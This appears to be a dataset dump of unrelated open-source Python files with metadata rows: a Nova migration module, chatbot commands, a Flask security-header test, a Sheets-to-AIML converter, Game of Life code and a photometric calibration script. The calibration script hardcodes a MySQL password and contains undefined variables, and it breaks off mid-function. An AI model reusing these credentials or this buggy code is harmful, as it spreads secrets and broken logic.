try:
commit_record, created = Commit.objects.get_or_create(
package=package,
commit_date=commit.commit.committer['date']
)
if not created:
break
except Commit.MultipleObjectsReturned:
continue
# If the commit record already exists, it means we are at the end of the
# list we want to import
package.save()
return package
repo_handler = GitHubHandler()
|
mit
| 5,148,200,768,411,809,000
| 27.977011
| 84
| 0.589052
| false
| 4.384348
| false
| false
| false
|
gyang/nova
|
nova/db/sqlalchemy/migration.py
|
1
|
4780
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils.version as dist_version
import os
import sys
from nova.db.sqlalchemy.session import get_engine
from nova import exception
from nova import flags
import sqlalchemy
import migrate
from migrate.versioning import util as migrate_util
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
_REPOSITORY = None
def db_sync(version=None):
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.Error(_("version should be an integer"))
current_version = db_version()
repository = _find_migrate_repo()
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version():
repository = _find_migrate_repo()
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
try:
for table in ('auth_tokens', 'zones', 'export_devices',
'fixed_ips', 'floating_ips', 'instances',
'key_pairs', 'networks', 'projects', 'quotas',
'security_group_instance_association',
'security_group_rules', 'security_groups',
'services', 'migrations',
'users', 'user_project_association',
'user_project_role_association',
'user_role_association',
'virtual_storage_arrays',
'volumes', 'volume_metadata',
'volume_types', 'volume_type_extra_specs'):
assert table in meta.tables
return db_version_control(1)
except AssertionError:
return db_version_control(0)
def db_version_control(version=None):
repository = _find_migrate_repo()
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
global _REPOSITORY
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
if _REPOSITORY is None:
_REPOSITORY = Repository(path)
return _REPOSITORY
|
apache-2.0
| 6,008,023,316,838,071,000
| 34.93985
| 78
| 0.64477
| false
| 4.27932
| false
| false
| false
|
Mego/DataBot
|
SE-Chatbot/botbuiltins/utils.py
|
1
|
4260
|
from Module import Command
from datetime import datetime
from requests import HTTPError
import re
import os
from ChatExchange3.chatexchange3.messages import Message
def command_alive(cmd, bot, args, msg, event):
return "Yes, I'm alive."
def command_utc(cmd, bot, args, msg, event):
return datetime.utcnow().ctime()
def command_listcommands(cmd, bot, args, msg, event):
if len(args) == 0:
return "Commands:%s%s" % (os.linesep, ', '.join([command.name for command in bot.modules.list_commands()]))
elif len(args) == 1:
module = bot.modules.find_module_by_name(args[0])
if module is None:
return "That module does not exist, or it is disabled."
cmds = module.list_commands()
if len(cmds) == 0:
return "No commands found in `%s`." % args[0]
return "Commands in `%s`:%s%s" % (args[0], os.linesep, ', '.join([command.name for command in cmds]))
else:
return "0 or 1 argument(s) expected."
#def parse_cat_command(cmd):
# if cmd.startswith("cat "):
# return [cmd[4:]]
# else:
# return False
def command_help(cmd, bot, args, msg, event):
if len(args) == 0:
return "I'm $BOT_NAME, $OWNER_NAME's chatbot. You can find the source code [on GitHub]($GITHUB). You can get a list of all commands by running `$PREFIXlistcommands`, or you can run `$PREFIXhelp command` to learn more about a specific command."
return bot.modules.get_help(args[0]) or "The command you want to look up does not exist."
#def command_cat(cmd, bot, args, msg, event):
# return args[0]
def command_read(cmd, bot, args, msg, event):
if len(args) == 0:
return "No message id/link supplied."
else:
message = []
for msg_id in args:
if msg_id.isdigit():
m_id = int(msg_id)
elif msg_id.split("#")[-1].isdigit():
m_id = int(msg_id.split("#")[-1])
elif msg_id.split("/")[-1].isdigit():
m_id = int(msg_id.split("/")[-1])
else:
return msg_id + " is not a valid message id/link."
try:
message += [re.sub(r'^:[0-9]+ ', '', Message(m_id, bot.client).content_source)]
except HTTPError:
return msg_id + ": message not found."
return ' '.join(message)
#def command_getcurrentusers(cmd, bot, args, msg, event):
# try:
# users = bot.room.get_current_user_names()
# except HTTPError:
# return "HTTPError when executing the command; please try again."
# except ConnectionError:
# return "ConnectionError when executing the command; please try again."
# users = [x.encode('ascii', errors='replace').decode('unicode_escape') for x in users]
# if len(args) > 0 and args[0] == "pingformat":
# users = [x.replace(" ", "") for x in users]
# return " ".join(users)
# return ", ".join(users)
#def command_ping(cmd, bot, args, msg, event):
# if len(args) == 0:
# return "No arguments supplied"
# else:
# return " ".join(["@" + arg for arg in args])
commands = [Command('alive', command_alive, "A command to see whether the bot is there. Syntax: `$PREFIXalive`", False, False),
Command('utc', command_utc, "Shows the current UTC time. Syntax: `$PREFIXutc`", False, False),
Command('listcommands', command_listcommands, "Returns a list of all commands. Syntax: `$PREFIXlistcommands`", False, False),
Command('help', command_help, "Shows information about the chat bot, or about a specific command. Syntax: `$PREFIXhelp [ command ]`", False, False),
#Command('cat', command_cat, "Repeats what you said back at you. Syntax: `$PREFIXcat something`", False, False, parse_cat_command, None, None, None),
Command('read', command_read, "Reads a post to you. Syntax: `$PREFIXread [ message_id ] ...`", False, False),
#Command('getcurrentusers', command_getcurrentusers, "Shows the current users of a room. Syntax: `$PREFIXgetcurrentusers`", False, False),
#Command('ping', command_ping, "Pings a list of users for you. Syntax: `$PREFIXping user [...]`", False, False, None, None, None, None)
]
module_name = "utils"
|
mit
| 6,625,686,474,243,252,000
| 42.469388
| 251
| 0.609624
| false
| 3.532338
| false
| false
| false
|
ONSdigital/ras-frontstage
|
tests/integration/views/surveys/test_download_survey.py
|
1
|
4001
|
import json
import unittest
from unittest.mock import patch
import requests_mock
from flask import request
from frontstage import app
from tests.integration.mocked_services import (
business_party,
case,
collection_instrument_seft,
encoded_jwt_token,
survey,
url_banner_api,
)
@requests_mock.mock()
class TestDownloadSurvey(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
self.app.set_cookie("localhost", "authorization", "session_key")
self.headers = {
"Authorization": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoicmluZ3JhbUBub3d3aGVyZS5jb20iLCJ1c2VyX3Njb3BlcyI6WyJjaS5yZWFkIiwiY2kud3JpdGUiXX0.se0BJtNksVtk14aqjp7SvnXzRbEKoqXb8Q5U9VVdy54" # NOQA
}
self.patcher = patch("redis.StrictRedis.get", return_value=encoded_jwt_token)
self.patcher.start()
def tearDown(self):
self.patcher.stop()
@patch("frontstage.controllers.collection_instrument_controller.download_collection_instrument")
@patch("frontstage.controllers.party_controller.is_respondent_enrolled")
@patch("frontstage.controllers.case_controller.get_case_by_case_id")
def test_download_survey_success(self, mock_request, get_case_by_id, _, download_collection_instrument):
mock_request.get(url_banner_api, status_code=404)
str = json.dumps(collection_instrument_seft)
binary = " ".join(format(ord(letter), "b") for letter in str)
get_case_by_id.return_value = case
headers = {"Content-type": "application/json", "Content-Length": "5962"}
download_collection_instrument.return_value = binary, headers
response = self.app.get(
f'/surveys/download-survey?case_id={case["id"]}&business_party_id={business_party["id"]}'
f'&survey_short_name={survey["shortName"]}'
)
self.assertEqual(response.status_code, 200)
def test_enforces_secure_headers(self, mock_request):
mock_request.get(url_banner_api, status_code=404)
with app.test_client() as client:
headers = client.get(
"/", headers={"X-Forwarded-Proto": "https"} # set protocol so that talisman sets HSTS headers
).headers
self.assertEqual("no-cache, no-store, must-revalidate", headers["Cache-Control"])
self.assertEqual("no-cache", headers["Pragma"])
self.assertEqual("max-age=31536000; includeSubDomains", headers["Strict-Transport-Security"])
self.assertEqual("DENY", headers["X-Frame-Options"])
self.assertEqual("1; mode=block", headers["X-Xss-Protection"])
self.assertEqual("nosniff", headers["X-Content-Type-Options"])
csp_policy_parts = headers["Content-Security-Policy"].split("; ")
self.assertIn("default-src 'self' https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn("font-src 'self' data: https://fonts.gstatic.com https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn(
"script-src 'self' https://www.googletagmanager.com https://cdn.ons.gov.uk 'nonce-{}'".format(
request.csp_nonce
),
csp_policy_parts,
)
# TODO: fix assertion error
# self.assertIn(
# "connect-src 'self' https://www.googletagmanager.com https://tagmanager.google.com https://cdn.ons.gov.uk "
# 'http://localhost:8082 ws://localhost:8082', csp_policy_parts)
self.assertIn(
"img-src 'self' data: https://www.gstatic.com https://www.google-analytics.com "
"https://www.googletagmanager.com https://ssl.gstatic.com https://cdn.ons.gov.uk",
csp_policy_parts,
)
self.assertIn(
"style-src 'self' https://cdn.ons.gov.uk 'unsafe-inline' https://tagmanager.google.com https://fonts.googleapis.com",
csp_policy_parts,
)
|
mit
| 3,429,505,770,575,708,700
| 44.988506
| 215
| 0.63859
| false
| 3.51273
| true
| false
| false
|
hansonrobotics/chatbot
|
src/chatbot/server/gsheet_chatter.py
|
1
|
8513
|
import os
import sys
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CWD, '..'))
import aiml
import urllib
import csv
import logging
import glob
from csvUtils import generateAimlFromLongCSV, generateAimlFromSimpleCSV
import xml.etree.ElementTree as ET
logger = logging.getLogger('hr.chatbot.gsheet_chatter')
xmlns = '{http://www.w3.org/2005/Atom}'
def getWorkSheets(skey, dirname='.'):
urlwks = "https://spreadsheets.google.com/feeds/worksheets/<KEY>/public/full"
urlwks = urlwks.replace("<KEY>", skey)
wksData = urllib.urlopen(urlwks).read()
tree = ET.fromstring(wksData)
author = tree.find(xmlns + 'author')
name = author.find(xmlns + 'name').text
email = author.find(xmlns + 'email').text
aiml_files, csv_files = [], []
if not os.path.isdir(dirname):
os.makedirs(dirname)
for entry in tree.findall('{}entry'.format(xmlns)):
aimlFileData = None
csvData = None
title = None
for item in entry.iter():
if item.tag == xmlns + 'link' and item.attrib.get('type') == 'text/csv':
pagelink = item.attrib.get('href')
#pagelink = pagelink.replace('format=csv', 'format=tsv', )
csvData = loadSheetViaURL(pagelink)
aimlFileData = generateAimlFromCSV(csvData)
if item.tag == xmlns + 'title':
title = item.text
filename = os.path.join(
dirname, '{}_{}.aiml'.format(skey, title))
csv_fname = os.path.join(
dirname, '{}_{}.csv'.format(skey, title))
if title == 'question': # skip "question" sheet
continue
if csvData is not None:
with open(csv_fname, 'w') as f:
f.write(csvData)
csv_files.append(csv_fname)
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
aiml_files.append(filename)
return aiml_files, csv_files
# http://stackoverflow.com/questions/11290337/how-to-convert-google-spreadsheets-worksheet-string-id-to-integer-index-gid
def to_gid(worksheet_id):
return int(worksheet_id, 36) ^ 31578
def loadSheet(skey, page):
#// REPLACE THIS WITH YOUR URL
logger.debug("PAGE:" + str(page))
logger.debug("GID :" + str(to_gid(str(page))))
urlcsv = "https://docs.google.com/spreadsheets/d/<KEY>/export?format=csv&id=<KEY>&gid=" + \
str(page) # +str(to_gid(str(page)))
urlcsv = urlcsv.replace("<KEY>", skey)
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def loadSheetViaURL(urlcsv):
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def generateAimlFromCSV(csvData, delimiter=','):
lines = csvData.splitlines()
if (len(lines) == 0):
return ""
header = lines[0]
aimlFile = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
aimlFile += '<aiml>\n'
reader = csv.DictReader(lines, delimiter=delimiter)
for row in reader:
logger.debug(row)
slots = {}
slots['PATTERN'] = "*"
slots['THAT'] = "*"
slots['TEMPLATE'] = ""
slots['TOPIC'] = "*"
slots['REDUCE_TO'] = ""
category = " <category>\n <pattern>XPATTERN</pattern>\n <that>XTHAT</that>\n <template>XTEMPLATEXREDUCE</template>\n </category>\n"
if (('PATTERN' in row) and (row['PATTERN'] != "")):
slots['PATTERN'] = row['PATTERN'].upper()
if (('THAT' in row) and (row['THAT'] != "")):
slots['THAT'] = row['THAT']
if (('TEMPLATE' in row) and (row['TEMPLATE'] != "")):
slots['TEMPLATE'] = row['TEMPLATE'].replace("#Comma", ",")
if (('TOPIC' in row) and (row['TOPIC'] != "")):
slots['TOPIC'] = row['TOPIC']
if (('REDUCE_TO' in row) and (row['REDUCE_TO'] != "")):
slots['REDUCE_TO'] = "<srai>" + row['REDUCE_TO'] + "</srai>"
category = category.replace("XPATTERN", slots['PATTERN'])
category = category.replace("XTHAT", slots['THAT'])
category = category.replace("XTEMPLATE", slots['TEMPLATE'])
category = category.replace("XTOPIC", slots['TOPIC'])
category = category.replace("XREDUCE", slots['REDUCE_TO'])
aimlFile += category
aimlFile += "</aiml>"
return aimlFile
def readAndLoadSheets(sheetList, engine):
for sheetKey in sheetList:
aiml_files, _ = getWorkSheets(sheetKey)
for aiml_file in aiml_files:
engine.learn(aiml_file)
# for page in range(0,3):
# csvDat = loadSheet(sheetKey,int(page))
# aimlFileData = generateAimlFromCSV(csvDat)
# if (len(aimlFileData)==0): continue
# filename = sheetKey+"_"+str(page) +".aiml"
# target = open(filename, 'w')
# target.truncate()
# target.write(aimlFileData)
# target.close()
# engine.learn(filename)
# The Kernel object is the public interface to
# the AIML interpreter.
def get_csv_version(csv_file):
# Guessing
with open(csv_file) as f:
header = f.readline().strip()
if sorted(header.split(',')) == sorted(
['Human_says', 'Meaning', 'Robot_says']):
return "3"
elif sorted(header.split(',')) == sorted(
['Type', 'Pattern', 'That', 'Template', 'Source', 'Think', 'Topic']):
return "2"
else:
return "1"
def batch_csv2aiml(csv_dir, aiml_dir, csv_version=None):
"""Convert all the csv files in the csv_dir to aiml files.
csv_version:
1: PATTERN,THAT,TOPIC,TEMPLATE,REDUCE_TO
2: Type,Pattern,That,Template,Source,Think
3: Human_says,Meaning,Robot_says
"""
if not os.path.isdir(aiml_dir):
os.makedirs(aiml_dir)
aiml_files = []
csv_files = []
for csv_file in glob.glob('{}/*.csv'.format(csv_dir)):
filename = os.path.basename(csv_file)
filename = os.path.splitext(filename)[0] + '.aiml'
filename = os.path.join(aiml_dir, filename)
aimlFileData = None
with open(csv_file) as f:
if csv_version is None:
csv_version = get_csv_version(csv_file)
if csv_version == '1':
csvData = f.read()
aimlFileData = generateAimlFromCSV(csvData, ',')
elif csv_version == '2':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromLongCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
elif csv_version == '3':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromSimpleCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
logger.info("Convert {} to {}".format(csv_file, filename))
aiml_files.append(filename)
csv_files.append(csv_file)
return aiml_files, csv_files
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
k = aiml.Kernel()
# **************** CHANGE TO GOOGLE SHEET KEY HERE ***********************
sheetList = {"1Tbro_Kjbby162Rms0GpQswoqhavXOoRe85HVRyEB1NU"}
readAndLoadSheets(sheetList, k)
#csvDat = loadSheet(sheetKey)
# print "CSVDAT"
# print csvDat
#aimlFile = generateAimlFromCSV(csvDat)
# print aimlFile
# Use the 'learn' method to load the contents
# of an AIML file into the Kernel.
# k.learn("std-startup.xml")
# Use the 'respond' method to compute the response
# to a user's input string. respond() returns
# the interpreter's response, which in this case
# we ignore.
# k.respond("load aiml b")
# Loop forever, reading user input from the command
# line and printing responses.
while True:
userin = raw_input("> ")
print "raw response:" + k.respond(userin)
|
mit
| 3,803,464,178,213,337,600
| 34.619247
| 142
| 0.573828
| false
| 3.501851
| false
| false
| false
|
BradleyMoore/Game_of_Life
|
app/life.py
|
1
|
2134
|
from collections import Counter
import pygame
from constants import BOX, HEIGHT, WIDTH, SCREEN
class Cell(object):
def __init__(self, pos):
self.color = (255,0,0)
self.neighbors = 0
self.neighbor_list = []
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def draw(self):
if self.x < 0 or self.x > WIDTH:
pass
elif self.y < 0 or self.y > HEIGHT:
pass
else:
pygame.draw.rect(SCREEN, self.color, (self.x*BOX, self.y*BOX, BOX, BOX))
def list_neighbors(self):
self.neighbor_list = []
for x in xrange(self.x-1, self.x+2):
for y in xrange(self.y-1, self.y+2):
self.neighbor_list.append((x,y))
self.neighbor_list.remove(self.pos)
return self.neighbor_list
class Pattern(object):
def __init__(self, name, pos):
self.name = name
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def create_pattern(self):
from patterns import patterns
pattern = patterns[self.name]
coordinates = []
for y in xrange(len(pattern)):
for x in xrange(len(pattern[y])):
if pattern[y][x] == 1:
coordinates.append((self.x+x, self.y+y))
return coordinates
def create_life(life, neighbors):
from game import TO_BE_BORN, TO_LIVE
new_life = []
# turn neighbor positions into a list of tuples
neighbor_dict = Counter(neighbors)
neighbor_list = neighbor_dict.items()
life_pos = []
if life != None:
for cell in life:
life_pos.append(cell.pos)
for pos, count in neighbor_list:
# give birth to cells
if count in TO_BE_BORN and pos not in life_pos:
new_life.append(pos)
# cells staying alive
if count in TO_LIVE and pos in life_pos:
new_life.append(pos)
return new_life
def get_neighbors(life):
neighbors = []
if life != None:
for cell in life:
neighbors.extend(cell.list_neighbors())
return neighbors
|
mit
| 5,229,378,662,050,004,000
| 21.946237
| 84
| 0.556232
| false
| 3.647863
| false
| false
| false
|
deapplegate/wtgpipeline
|
photo_illum.py
|
1
|
18300
|
#!/usr/bin/env python
# Python module for photometric calibration.
# It needs the Python modules ppgplot and
# mpfit to be installed.
# 03.03.2005 Fixed a serious bug in the rejection loop. Instead
# of using the remaining points we always used all points
# and rejected points until the original fit matched the data
# 15.02.2005 Fixed the range of the y-axes in the plots to more
# sensible values
# 14.02.2005 Fixed a bug when more paramters were fitted than
# data points were present
# We now rescale points to the airmass/color at which
# they are plotted (zero)
# Check that label is set
# 10.12.2004 Now takes a new argument "label" to be
# used as axis label in the color plot
import copy
import getopt
import string
import sys
import mpfit
import Numeric
from ppgplot import *
import BonnLogger
def illum_funct(p, fjac=None, X=None, Y=None):
[A,B,C,D,E,F] = p
model = A*X**2 + B*Y**2 + C*X*Y + D*X + E*Y + F
status = 0
return([status, (model-y)/err])
def phot_funct_2(p, fjac=None, y=None, err=None):
model = p[0]
status = 0
return([status, (model-y)/err])
def phot_funct_1(p, fjac=None, color=None, y=None, err=None):
model = p[0] + p[1]*color
status = 0
return([status, (model-y)/err])
def phot_funct_0(p, fjac=None, airmass=None, color1=None, color2=None, y=None, err=None):
model = p[0] + p[1]*color1 + p[2]*color2
status = 0
return([status, (model-y)/err])
def readInput(file):
f = open(file, "r")
instMagList = []
stdMagList = []
magErrList = []
colList = []
airmassList = []
for line in f.readlines():
instMag, stdMag, col, airmass, instMagErr, stdMagErr = string.split(line)
magErr = (float(instMagErr)**2. + float(stdMagErr)**2.)**0.5
magErrList.append(magErr)
instMagList.append(float(instMag))
stdMagList.append(float(stdMag))
colList.append(float(col))
airmassList.append(float(airmass))
f.close()
instMag = Numeric.array(instMagList)
stdMag = Numeric.array(stdMagList)
data = stdMag - instMag
airmass = Numeric.array(airmassList)
color = Numeric.array(colList)
magErr = Numeric.array(magErrList)
return data, airmass, color, magErr
#def photCalib(data_save, airmass_save, color_save, err_save, p, sigmareject, maxSigIter=50):
def photCalib(dictionary, p, sigmareject, maxSigIter=50):
save_len = len(data_save)
parinfos = [[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0, "limited": [0,1], "limits": [-99, 0]},{"value": p[2], "fixed": 0}],[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0}],[{"value": p[0], "fixed": 0}]]
phot_functs = [phot_funct_0, phot_funct_1, phot_funct_2]
solutions = []
for fit_type in [0,1,2]:
airmass = copy.copy(airmass_save)
color = copy.copy(color_save)
data_tmp = copy.copy(data_save)
err = copy.copy(err_save)
#first apply coefficients we are holding fixed
data = copy.copy(data_tmp)
if fit_type == 1:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i]
if fit_type == 2:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i] - p[2]*color[i]
print data_tmp[0], data[0]
data_rec = copy.copy(data)
parinfo = parinfos[fit_type]
#for j in range(len(parinfo)):
#if j in fixedList:
# print "Element", j, "is fixed at", p[j]
# parinfo[j]["fixed"] = 1
#else:
# parinfo[j]["fixed"] = 0
for i in range(maxSigIter):
old_len = len(data)
fas = [{"airmass": airmass,"color": color, "y": data, "err": err},{"color": color,"y": data, "err": err}, {"y": data, "err": err}]
fa = fas[fit_type]
phot_funct = phot_functs[fit_type]
m = mpfit.mpfit(phot_funct, functkw=fa,
parinfo=parinfo,
maxiter=1000, quiet=1)
print m.covar, m.params, m.perror
if (m.status <= 0):
print 'error message = ', m.errmsg
condition = Numeric.zeros(len(data))
break
#airmass = copy.copy(airmass_save)
#color = copy.copy(color_save)
#data = copy.copy(data_save)
#err = copy.copy(err_save)
# Compute a 3 sigma rejection criterion
#condition = preFilter(m.params, data_save, data,
# airmass_save, airmass,
# color_save, color)
params = [0,0,0]
perror = [0,0,0]
print m.params,m.perror, m.covar
if fit_type == 0:
params = copy.copy(m.params)
perror = copy.copy(m.perror)
if fit_type == 1:
params[0] = m.params[0]
params[2] = m.params[1]
params[1] = p[1]
perror[0] = m.perror[0]
perror[2] = m.perror[1]
if fit_type == 2:
params[0] = m.params[0]
params[1] = p[1]
params[2] = p[2]
perror[0] = m.perror[0]
# Compute a 3 sigma rejection criterion
print params, data_rec[0], data[0]
condition, redchisq = SigmaCond(params, data_save, data,
airmass_save, airmass,
color_save, color, err_save, err, sigmareject)
print redchisq
# Keep everything (from the full data set!) that is within
# the 3 sigma criterion
#data_sig = Numeric.compress(condition, data_save)
data = Numeric.compress(condition, data_rec)
airmass = Numeric.compress(condition, airmass_save)
color = Numeric.compress(condition, color_save)
err = Numeric.compress(condition, err_save)
new_len = len(data)
if float(new_len)/float(save_len) < 0.5:
print "Rejected more than 50% of all measurements."
print "Aborting this fit."
break
# No change
if new_len == old_len:
print "Converged! (%d iterations)" % (i+1, )
print "Kept %d/%d stars." % (new_len, save_len)
break
print params, perror, condition
meanerr = Numeric.sum(err_save)/len(err_save)
solutions.append([params, perror, redchisq, meanerr, condition])
return solutions
def SigmaCond(p, data_save, data, airmass_save, airmass, color_save, color, err_save, err, sigmareject):
if len(data_save) > 1:
#airmass = airmass[int(0.1*len(airmass)):int(0.9*len(airmass))]
#color = color[int(0.1*len(color)):int(0.9*len(color))]
#data = data[int(0.1*len(data)):int(0.9*len(data))]
mo = p[0] + p[1]*airmass + p[2]*color
mo_save = p[0] + p[1]*airmass_save + p[2]*color_save
print len(data), len(mo), len(err)
reddm = (data-mo)/err
redchisq = Numeric.sqrt(Numeric.sum(Numeric.power(reddm, 2)) / (len(reddm) - 1))
dm = data-mo
dm_save = data_save - mo_save
mean = Numeric.sum(dm)/len(dm)
sigma = Numeric.sqrt(Numeric.sum(Numeric.power(mean-dm, 2)) / (len(dm) - 1))
#condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * sigma)
condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * err_save)
else:
condition = Numeric.zeros(len(data_save))
return condition, redchisq
def makePlots(data, airmass, color, outfile, solutions, label):
file = outfile+".ps"
pgbeg(file+"/cps", 2, 3)
pgiden()
for i in range(3):
result = solutions[i]
# Airmass plot
pgpanl(1, i+1)
airMin = 1
airMax = Numeric.sort(airmass)[-1]*1.1
print result
dataAirMax = result[0][0]+result[0][1]+1
dataAirMin = result[0][0]+result[0][1]-1
dataColMax = result[0][0]+1
dataColMin = result[0][0]-1
colMinVal = Numeric.sort(color)[0]
if colMinVal < 0:
colMin = colMinVal*1.1
else:
colMin = colMinVal*0.95
colMax = Numeric.sort(color)[-1]*1.1
if result[0] and result[1]:
eqStr = "%d parameter fit: Mag-Mag(Inst) = %.2f\\(2233)%.2f + (%.2f\\(2233)%.2f) airmass + "\
"(%.2f\\(2233)%.2f) color" % \
(3-i, result[0][0], result[1][0], result[0][1], result[1][1], result[0][2], result[1][2])
else:
eqStr = "%d parameter fit not possible" % (3-i, )
fixenv([1, airMax] ,
[dataAirMin, dataAirMax],
eqStr, label=["Airmass", "Mag - Mag(Inst)"])
condition = result[4]
goodAirmass = Numeric.compress(condition, airmass)
goodData = Numeric.compress(condition, data)
goodColor = Numeric.compress(condition, color)
badAirmass = Numeric.compress(Numeric.logical_not(condition), airmass)
badData = Numeric.compress(Numeric.logical_not(condition), data)
badColor = Numeric.compress(Numeric.logical_not(condition), color)
if len(goodData):
pgsci(3)
# Rescale to zero color and filter for data within
# our plotting range
plotData = goodData-result[0][2]*goodColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, goodAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
print type(plotAirmass), type(plotData)
if len(badData):
pgsci(2)
plotData = badData-result[0][2]*badColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, badAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
pgsci(1)
a = Numeric.arange(1, airMax, 0.01)
m = result[0][0] + result[0][1] * a
pgline(a, m)
# Color Plot
pgpanl(2, i+1)
fixenv([colMin, colMax] ,
[dataColMin, dataColMax],
eqStr, label=[label, "Mag - Mag(Inst)"])
if len(goodData):
pgsci(3)
# Rescale to zero airmass and filter for data within
# our plotting range
plotData = goodData-result[0][1]*goodAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, goodColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
if len(badData):
pgsci(2)
plotData = badData-result[0][1]*badAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, badColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
pgsci(1)
a = Numeric.arange(colMin, colMax, 0.01)
m = result[0][0] + result[0][2] * a
pgline(a, m)
return
def fixenv (xrange=[0,1], yrange=[0,1], fname="none", ci = 1, label=["x", "y"]):
# set axis ranges.
pgswin(xrange[0], xrange[1], yrange[0], yrange[1])
pgsci(ci) # set color index.
pgbox() # draw axes.
pgsci(1) # back to color index 1 (white)
pglab(label[0], label[1], fname) # label the plot
return
def saveResults(file, solutions, step, sigmareject, cluster, colorused):
f = open(file+".asc", "w")
which_solution = 0
import MySQLdb, sys, os, re
db2 = MySQLdb.connect(db='subaru', user='weaklensing', passwd='darkmatter', host='ki-rh8')
c = db2.cursor()
#c.execute("DROP TABLE IF EXISTS photometry_db")
for result in solutions:
which_solution += 1
if Numeric.sometrue(result[2]):
import os , time
user_name = os.environ['USER']
bonn_target = os.environ['BONN_TARGET']
bonn_filter = os.environ['BONN_FILTER']
time_now = time.asctime()
user = user_name #+ str(time.time())
standardstartype = os.environ['STANDARDSTARTYPE']
floatvars = {'ZP':result[0][0],'AIRMASS':result[0][1],'COLOR':result[0][2],'ZPERR':result[1][0],'AIRMASSERR':result[1][1],'COLORERR':result[1][2],'REDCHISQ':result[2],'MEANERR':result[3]}
stringvars = {'USER':user_name,'BONN_TARGET':bonn_target,'BONN_FILTER':bonn_filter,'TIME':time_now,'CHOICE':'', 'NUMBERVARS':4-which_solution,'STANDARDSTARTYPE':standardstartype,'USER': user, 'step': step, 'sigmareject':sigmareject, 'cluster':cluster,'colorused':colorused}
# make database if it doesn't exist
